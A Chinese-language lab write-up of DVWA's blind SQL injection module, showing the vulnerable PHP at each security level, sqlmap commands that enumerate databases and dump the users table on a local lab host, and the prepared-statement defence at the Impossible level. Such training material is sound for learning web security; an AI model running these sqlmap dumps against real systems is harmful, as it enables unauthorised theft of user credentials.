DVWA靶场-SQL Injection (Blind) SQL盲注
往期博文:
DVWA靶场-Brute Force Source 暴力破解
DVWA靶场-Command Injection 命令注入
DVWA靶场-CSRF 跨站请求伪造
DVWA靶场-File Inclusion 文件包含
DVWA靶场-File Upload 文件上传
DVWA靶场-SQL Injection SQL注入
靶场环境搭建
https://github.com/ethicalhack3r/DVWA
[网络安全学习篇附]:DVWA 靶场搭建
目录
SQL Injection (Blind)
Low SQL Injection (Blind)
核心代码
Medium SQL Injection (Blind)
核心代码
High SQL Injection (Blind)
核心代码
Impossible SQL Injection (Blind)
核心代码
SQL Injection (Blind)
Low SQL Injection (Blind)
核心代码
0 ) {
echo 'User ID exists in the database.
';
}
else {
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
echo 'User ID is MISSING from the database.
';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>由于sql 盲注比较浪费时间,笔者这里使用sqlmap 工具进行注入
列出当前数据库名
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --current-db
列出表名
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 --tables
获取users 表中数据
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 -T users --dump --batch
Medium SQL Injection (Blind)
核心代码
0 ) {
// Feedback for end user
echo 'User ID exists in the database.
';
}
else {
// Feedback for end user
echo 'User ID is MISSING from the database.
';
}
//mysql_close();
}
?>可以很明显的看到,这里提交方式由原来的get 变为了post
使用bp 抓包,抓到post请求的数据包,将其保存至post.r 文件中
vim post.r
sqlmap -r post.r -D dvwa1 -T users --dump --batch
High SQL Injection (Blind)
核心代码
0 ) {
// Feedback for end user
echo 'User ID exists in the database.
';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo 'User ID is MISSING from the database.
';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>相较于前面两种,这里id 值由cookie 传递,设置了睡眠时间,增加了盲注的时间耗费
获取当前数据库名
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1*; security=high; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --dbms=MySQL --technique=B --random-agent --flush-session -v 3 --current-db
至于用户名和密码,由于太浪费时间,笔者这里就不做赘述了
Impossible SQL Injection (Blind)
核心代码
prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
// Get results
if( $data->rowCount() == 1 ) {
// Feedback for end user
echo 'User ID exists in the database.
';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo 'User ID is MISSING from the database.
';
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>可以看出,impossible prepare 和 PDO 防御SQL,注入,同时加入了token验证机制,进一步提高其安全性
https://www.sqlsec.com/2020/05/dvwa.html#toc-heading-31
https://www.freebuf.com/articles/web/119467.html